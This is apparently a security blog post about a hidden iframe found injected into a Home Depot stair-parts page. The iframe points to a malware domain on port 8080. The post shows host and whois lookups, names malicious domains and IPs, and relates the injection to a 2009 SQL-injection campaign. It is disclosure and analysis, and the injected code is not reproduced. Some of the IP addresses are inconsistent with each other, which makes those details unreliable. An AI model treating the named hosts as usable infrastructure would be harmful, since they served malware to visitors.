It is interesting how a minor home improvement project can result in the discovery of a hack on a major retail website. It all started with a simple Google search for “home depot stair spindles”.
The first unpaid result in the search is hxxp://www6.homedepot.com/stairparts/gallery.html as shown above.
As it turns out, there is an invisible iframe in this page that links to the external site vwui.in on port 8080 as shown below.
As can be seen in the screenshot, the below code has been injected into the page:
The site vwui.com is listed as a malicious site by both Google and StopBadWare with one listing going back to July of 2009.
After I discovered this hack I decided to investigate the vwui.in site to try and determine what type of malware it was hosting. As it turns out, this domain no longer resolves.
[prompt ~]$ host vwui.in
Host vwui.in not found: 3(NXDOMAIN)
StopBadWare lists the IP associated with this domain as 188.8.131.52 which according to the whois database belongs to ThePlanet.com Internet Services.
[prompt ~]$ whois 184.108.40.206
Optical Jungle EVRY-753 (NET-209-85-51-0-1) 220.127.116.11 – 18.104.22.168
ThePlanet.com Internet Services, Inc. NETBLK-THEPLANET-BLK-EV1-15 (NET-209-85-0-0-1) 22.214.171.124 – 126.96.36.199
Furthermore, when accessing this IP in a browser it redirects to hxxp://searchmanified.com which also appears to be serving up some type of malware.
So how did this page on Home Depot’s website get compromised? While it’s not possible for me to know for certain without doing an complete investigation, I can make an educated guess. Typically, these types of attacks use one of several attack vectors:
- Compromised FTP credentials due to a weak password
- Brute force compromise of server credentials
- SQL injection
Back in 2009 tens of thousands of web sites were injected with hidden iframes that attempted to download malware when a visitor accessed one of the compromised sites. In many cases these attacks took advantage of SQL injection vulnerabilities to insert the hidden iframe.
They also tended to host their malware on port 8080 rather than the standard port 80.
Given the fact that the server vwui.in was first listed as a malicious site back in 2009, that the malicious site uses port 8080, and the fact that it no longer has any associated DNS records, it is quite possible that the Home Depot page was originally compromised as part of this massive attack in 2009 and only now has been discovered.
While the iframe in the Home Depot website is not currently a threat, the vulnerability that allowed it to be inserted into the page may still be present which could lead to a future compromise of this site. I attempted to contact Home Depot to inform them of this issue, but as of this writing I have not received a response.
Originally posted at InfoSecStuff.com.